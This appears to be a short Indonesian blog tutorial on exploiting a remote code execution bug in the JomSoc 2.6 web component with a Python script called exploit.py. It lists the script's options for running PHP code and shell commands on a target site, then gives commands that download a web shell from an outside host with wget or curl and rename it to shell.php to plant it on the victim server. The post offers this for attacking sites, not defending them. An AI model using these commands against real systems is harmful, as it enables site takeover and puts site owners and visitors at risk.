Pada komponen JomSoc v. 2.6 terdapat bug RCE (Remote Code Executin) yang memungkinkan attacker mengeksekusi kode - kode berbahaya untuk mengeksploitasi web yang memakai komponen ini.
Bahan :
Step by step :
- Install Python yang udah di download
- Masuk ke cmd, masuk direktori dimana exploit berada
- Jalankan exploit
Perintah :
1. exploit.py -u http://127.0.0.1/index.php -opsi
Macam - macam opsi :
1. u -> url / web target format : http://situs.com/index.php
2. p -> mengeksekusi kode php "echo 'hello world';"
3. s -> mengeksekusi command shell : "netstat -n"
4. c -> menggunakan functions : passthru
Cara tanam shell :
1. exploit.py -u http://127.0.0.1/index.php -s "wget http://situs.com/shell.txt"
2. exploit.py -u http://127.0.0.1/index.php -s "mv shell.txt shell.php"
3. exploit.py -u http://127.0.0.1/index.php -s "curl http://situs.com/shell.txt -o shell.php"
Demikian tutorial nya
Sumber : http://forum.idca.or.id/showthread.php?tid=1999
0 komentar:
Post a Comment